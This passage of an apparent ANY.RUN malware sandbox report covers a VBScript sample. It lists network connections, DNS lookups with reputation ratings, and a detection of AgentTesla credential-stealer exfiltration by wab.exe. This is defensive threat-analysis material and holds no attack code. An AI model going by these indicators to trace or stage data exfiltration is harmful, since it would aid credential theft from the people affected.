ocsp.digicert.com
EDGECAST
US
whitelisted
700
svchost.exe
142.250.186.78:443
drive.google.com
GOOGLE
US
whitelisted
700
svchost.exe
142.250.186.65:443
drive.usercontent.google.com
GOOGLE
US
whitelisted
3996
svchost.exe
20.190.159.23:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1260
backgroundTaskHost.exe
104.126.37.162:443
www.bing.com
Akamai International B.V.
DE
unknown
1260
backgroundTaskHost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
ocsp.digicert.com
  • 192.229.221.95
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
drive.google.com
  • 142.250.186.78
shared
drive.usercontent.google.com
  • 142.250.186.65
unknown
www.bing.com
  • 104.126.37.162
  • 104.126.37.161
  • 104.126.37.163
  • 104.126.37.171
  • 104.126.37.168
  • 104.126.37.160
  • 104.126.37.147
  • 104.126.37.155
  • 104.126.37.153
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted
ocsp.pki.goog
  • 172.217.16.131
whitelisted

Threats

PID
Process
Class
Message
3352
wab.exe
A Network Trojan was detected
STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP)
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs